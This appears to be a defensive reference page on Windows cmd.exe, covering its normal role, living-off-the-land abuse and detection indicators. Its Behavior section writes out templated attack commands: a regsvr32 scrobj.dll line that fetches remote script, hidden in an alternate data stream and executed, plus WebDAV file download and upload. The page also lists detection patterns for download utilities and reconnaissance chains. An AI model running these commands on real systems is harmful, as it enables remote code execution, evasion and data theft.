Process
cmd.exe
cmd.exe is the Windows Command Processor, the classic command-line interpreter for Windows. It runs typed commands and batch scripts (.bat and .cmd files), provides built-in commands like dir, copy, and set, and chains programs together with operators. It predates PowerShell and is still the default shell behind countless scripts, installers, and automation tasks.
File identity
Not observed.
Not observed.
Not observed.
Not observed.
Execution context
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Ancestry
Not observed.
Not observed.
Not observed.
Not observed.
Behavior
Not observed.
Not observed.
Not observed.
Not observed.
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.batADS · Can be used to evade defensive countermeasures or to hide as a persistence mechanismcmd.exe - < {PATH}:payload.batADS · Can be used to evade defensive countermeasures or to hide as a persistence mechanismtype {PATH_SMB} > {PATH_ABSOLUTE}Download · Download/copy a file from a WebDAV servertype {PATH_ABSOLUTE} > {PATH_SMB}Upload · Upload a file to a WebDAV server
Indicators
Not observed.
Analysis
cmd.exe is the command shell that has shipped with Windows NT from the start. The genuine binary lives at C:\Windows\System32\cmd.exe, with a 32-bit copy under SysWOW64. It interprets built-in commands (dir, set, copy, del, and the like) directly, runs external programs by name, and executes batch files written in its own simple scripting syntax.
It can run interactively or take a command non-interactively with /c (run the command, then exit) or /k (run it, then stay open). Commands can be combined with the &, &&, and || operators and piped with |. Like any console program it is hosted by conhost.exe.
Its parent is whatever launched it: an interactive explorer.exe session, a batch file, the Task Scheduler, a software installer, or another program shelling out to run a command. As with PowerShell, a broad set of parents is normal, so the process is hard to baseline on its own.
cmd.exe is one of the most common living-off-the-land tools on Windows (T1059.003). The signed binary runs reconnaissance, chains utilities together, and launches other LOLBINs, so path and signature checks pass and what gives it away is the command line and the parent. A cmd.exe spawned by an Office application or an internet-facing service process is a strong sign of macro-borne or exploited-service execution.
Attackers obfuscate command lines to slip past detection (T1027.010), using caret escapes, doubled quotes, and environment-variable substitution so that a string like c^m^d or %COMSPEC% reaches the interpreter intact while reading as noise to a scanner.
Hands-on-keyboard activity often surfaces here first. A /c chain of discovery commands (whoami /all, net group, ipconfig /all, systeminfo) run in quick succession is a recognizable pattern of an operator getting their bearings on a freshly accessed host.
- Image path other than
C:\Windows\System32\cmd.exeor itsSysWOW64copyhigh - Parent is an Office application,
wscript.exe,cscript.exe, ormshta.exehigh - Spawned by a server or service process such as
w3wp.exeorsqlservr.exehigh - A
/cline invoking download or proxy LOLBINs (certutil.exe,bitsadmin.exe,powershell.exe -enc)high - A
/cline running a recon chain (whoami,net,ipconfig,systeminfo,nltest)med - Command line obfuscated with caret (
^) escapes, stray quotes, or environment-variable substitutionmed - Output redirected to an alternate data stream or an unusual temp pathmed
Telemetry
Not observed.
Not observed.